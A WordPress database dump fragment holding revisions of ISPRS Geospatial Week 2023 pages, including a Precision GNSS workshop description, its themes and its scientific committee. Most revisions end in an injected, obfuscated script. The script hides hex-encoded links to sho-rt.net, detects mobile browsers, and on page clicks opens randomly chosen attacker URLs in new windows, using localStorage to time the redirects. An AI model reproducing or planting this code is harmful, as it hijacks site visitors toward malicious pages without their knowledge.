|\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Youth Presentation Forum','','inherit','closed','closed','','3613-revision-v1','','','2023-02-05 14:47:39','2023-02-05 14:47:39','',3613,'https://gsw2023.com/?p=3850',0,'revision','',0),
(3851,1,'2023-02-05 14:49:43','2023-02-05 14:49:43','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3480\" img_size=\"600x600\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Precision GNSS: Technology Advances and Applications for Navigation and Mapping</span></strong></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify;\">The Global Navigation Satellite Systems (GNSS) have become an indispensable component for a wide range of applications. With rapid advances in GNSS system development which currently includes four operational systems and various regional augmentation systems, high accuracy is increasingly demanded by many emerging applications. For examples, within-lane autonomous vehicle control requires dm or better positioning accuracy while dm accuracy is also demanded for smartphone-based navigation and mapping. Although high accuracy has been widely demonstrated, the use of low-cost GNSS receivers in mass-market applications present various challenges in order to achieve high accuracy with stringent requirements on system availability and integrity. This workshop will seek contributions that are addressing the related challenges. They can be research progress on the development of new concept, models, algorithms and systems for precise GNSS positioning (PPP, PPP-RTK, LEO etc) and integrated navigation systems (GNSS, INS, Vision etc), as well as novel applications to navigation and mapping including application system design, implementation, prototype, product and testing results.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"default_button\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"64\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"color: cyan;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6>Mathematical models and algorithms for precision GNSS</h6>\n</li>\n<li>\n<h6>Precise GNSS positioning algorithms (PPP, RTK, PPP-RTK etc)</h6>\n</li>\n<li>\n<h6>GNSS integrity monitoring and quality control algorithms</h6>\n</li>\n<li>\n<h6>GNSS augmentation algorithms and systems</h6>\n</li>\n<li>\n<h6>LEO-based satellite navigation and augmentation systems</h6>\n</li>\n<li>\n<h6>Atmospheric augmentation corrections for precision GNSS</h6>\n</li>\n<li>\n<h6>Precision GNSS with smartphones</h6>\n</li>\n<li>\n<h6>Precision GNSS with low-cost receivers</h6>\n</li>\n<li>\n<h6>Multi-sensor integrated systems (GNSS, INS, Vision etc)</h6>\n</li>\n<li>\n<h6>Precise positioning technologies in GNSS challenged environments</h6>\n</li>\n<li>\n<h6>Alternative technologies in GNSS denied environments</h6>\n</li>\n<li>\n<h6>Advanced software and hardware precision GNSS receivers</h6>\n</li>\n<li>\n<h6>Trends of future precision GNSS technology, systems and services</h6>\n</li>\n<li>\n<h6>Applications to navigation and mapping</h6>\n</li>\n</ul>\n<h6></h6>\n<p>&nbsp;</p>\n<h5 style=\"color: gray;\"><span style=\"font-size: 12pt;\"><strong><u>Scientific Committee:</u></strong></span></h5>\n<ul>\n<li>\n<h6>Yang Gao, University of Calgary, Canada</h6>\n</li>\n<li>\n<h6>Xiaohong Zhang, Wuhan University, China</h6>\n</li>\n<li>\n<h6>Ahmed El-Mowafy, Curtin University, Australia</h6>\n</li>\n<li>\n<h6>OlaØvstedal, Norwegian University of Life Sciences, Norway</h6>\n</li>\n<li>\n<h6>Jacek Paziewski, University of Warmia and Mazury in Olsztyn, Poland</h6>\n</li>\n<li>\n<h6>Augusto Mazzoni, Sapienza University of Rome, Italy</h6>\n</li>\n<li>\n<h6>Washington Ochieng, Imperial College of London, UK</h6>\n</li>\n<li>\n<h6>Nobuaki Kubo, Tokyo University of Marine Science and Technology, Japan</h6>\n</li>\n<li>\n<h6>Jinling Wang, University of New South Wales, Australia</h6>\n</li>\n<li>\n<h6>Charles Toth, Ohio State University, USA</h6>\n</li>\n<li>\n<h6>Byungwoon Park, Sejong University, South Korea</h6>\n</li>\n<li>\n<h6>Maorong Ge, German Research Centre for Geosciences (GFZ), Germany</h6>\n</li>\n<li>\n<h6>Michael Fu, Google, USA</h6>\n</li>\n<li>\n<h6>Chris Rizos, University of New South Wales, Australia</h6>\n</li>\n<li>\n<h6>Sunil Bisnath, York University, Canada</h6>\n</li>\n<li>\n<h6>Galera Monico, São Paulo State University, Brazil</h6>\n</li>\n<li>\n<h6>Paul Groves, University College of London, UK</h6>\n</li>\n<li>\n<h6>George Liu, Hong Kong Polytechnic University, Hong Kong</h6>\n</li>\n<li>\n<h6>Guanwen Huang, Chang’An University, China</h6>\n</li>\n<li>\n<h6>Hongzhou Yang, University of Calgary, Canada</h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3486\" img_size=\"600x600\"][vc_single_image image=\"3494\" img_size=\"600x600\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','inherit','closed','closed','','3452-autosave-v1','','','2023-02-05 14:49:43','2023-02-05 14:49:43','',3452,'https://gsw2023.com/?p=3851',0,'revision','',0),
(3852,1,'2023-02-05 14:50:25','2023-02-05 14:50:25','[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3480\" img_size=\"600x600\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Precision GNSS: Technology Advances and Applications for Navigation and Mapping</span></strong></h5>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5 style=\"text-align: justify;\">The Global Navigation Satellite Systems (GNSS) have become an indispensable component for a wide range of applications. With rapid advances in GNSS system development which currently includes four operational systems and various regional augmentation systems, high accuracy is increasingly demanded by many emerging applications. For examples, within-lane autonomous vehicle control requires dm or better positioning accuracy while dm accuracy is also demanded for smartphone-based navigation and mapping. Although high accuracy has been widely demonstrated, the use of low-cost GNSS receivers in mass-market applications present various challenges in order to achieve high accuracy with stringent requirements on system availability and integrity. This workshop will seek contributions that are addressing the related challenges. They can be research progress on the development of new concept, models, algorithms and systems for precise GNSS positioning (PPP, PPP-RTK, LEO etc) and integrated navigation systems (GNSS, INS, Vision etc), as well as novel applications to navigation and mapping including application system design, implementation, prototype, product and testing results.</h5>\r\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"default_button\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"64\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h5 style=\"color: gray;\"><span style=\"font-size: 14pt;\"><strong><u>Themes of event:</u></strong></span></h5>\r\n<ul>\r\n 	<li>\r\n<h6>Mathematical models and algorithms for precision GNSS</h6>\r\n</li>\r\n 	<li>\r\n<h6>Precise GNSS positioning algorithms (PPP, RTK, PPP-RTK etc)</h6>\r\n</li>\r\n 	<li>\r\n<h6>GNSS integrity monitoring and quality control algorithms</h6>\r\n</li>\r\n 	<li>\r\n<h6>GNSS augmentation algorithms and systems</h6>\r\n</li>\r\n 	<li>\r\n<h6>LEO-based satellite navigation and augmentation systems</h6>\r\n</li>\r\n 	<li>\r\n<h6>Atmospheric augmentation corrections for precision GNSS</h6>\r\n</li>\r\n 	<li>\r\n<h6>Precision GNSS with smartphones</h6>\r\n</li>\r\n 	<li>\r\n<h6>Precision GNSS with low-cost receivers</h6>\r\n</li>\r\n 	<li>\r\n<h6>Multi-sensor integrated systems (GNSS, INS, Vision etc)</h6>\r\n</li>\r\n 	<li>\r\n<h6>Precise positioning technologies in GNSS challenged environments</h6>\r\n</li>\r\n 	<li>\r\n<h6>Alternative technologies in GNSS denied environments</h6>\r\n</li>\r\n 	<li>\r\n<h6>Advanced software and hardware precision GNSS receivers</h6>\r\n</li>\r\n 	<li>\r\n<h6>Trends of future precision GNSS technology, systems and services</h6>\r\n</li>\r\n 	<li>\r\n<h6>Applications to navigation and mapping</h6>\r\n</li>\r\n</ul>\r\n<h6></h6>\r\n&nbsp;\r\n<h5 style=\"color: gray;\"><span style=\"font-size: 12pt;\"><strong><u>Scientific Committee:</u></strong></span></h5>\r\n<ul>\r\n 	<li>\r\n<h6>Yang Gao, University of Calgary, Canada</h6>\r\n</li>\r\n 	<li>\r\n<h6>Xiaohong Zhang, Wuhan University, China</h6>\r\n</li>\r\n 	<li>\r\n<h6>Ahmed El-Mowafy, Curtin University, Australia</h6>\r\n</li>\r\n 	<li>\r\n<h6>OlaØvstedal, Norwegian University of Life Sciences, Norway</h6>\r\n</li>\r\n 	<li>\r\n<h6>Jacek Paziewski, University of Warmia and Mazury in Olsztyn, Poland</h6>\r\n</li>\r\n 	<li>\r\n<h6>Augusto Mazzoni, Sapienza University of Rome, Italy</h6>\r\n</li>\r\n 	<li>\r\n<h6>Washington Ochieng, Imperial College of London, UK</h6>\r\n</li>\r\n 	<li>\r\n<h6>Nobuaki Kubo, Tokyo University of Marine Science and Technology, Japan</h6>\r\n</li>\r\n 	<li>\r\n<h6>Jinling Wang, University of New South Wales, Australia</h6>\r\n</li>\r\n 	<li>\r\n<h6>Charles Toth, Ohio State University, USA</h6>\r\n</li>\r\n 	<li>\r\n<h6>Byungwoon Park, Sejong University, South Korea</h6>\r\n</li>\r\n 	<li>\r\n<h6>Maorong Ge, German Research Centre for Geosciences (GFZ), Germany</h6>\r\n</li>\r\n 	<li>\r\n<h6>Michael Fu, Google, USA</h6>\r\n</li>\r\n 	<li>\r\n<h6>Chris Rizos, University of New South Wales, Australia</h6>\r\n</li>\r\n 	<li>\r\n<h6>Sunil Bisnath, York University, Canada</h6>\r\n</li>\r\n 	<li>\r\n<h6>Galera Monico, São Paulo State University, Brazil</h6>\r\n</li>\r\n 	<li>\r\n<h6>Paul Groves, University College of London, UK</h6>\r\n</li>\r\n 	<li>\r\n<h6>George Liu, Hong Kong Polytechnic University, Hong Kong</h6>\r\n</li>\r\n 	<li>\r\n<h6>Guanwen Huang, Chang’An University, China</h6>\r\n</li>\r\n 	<li>\r\n<h6>Hongzhou Yang, University of Calgary, Canada</h6>\r\n</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3486\" img_size=\"600x600\"][vc_single_image image=\"3494\" img_size=\"600x600\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 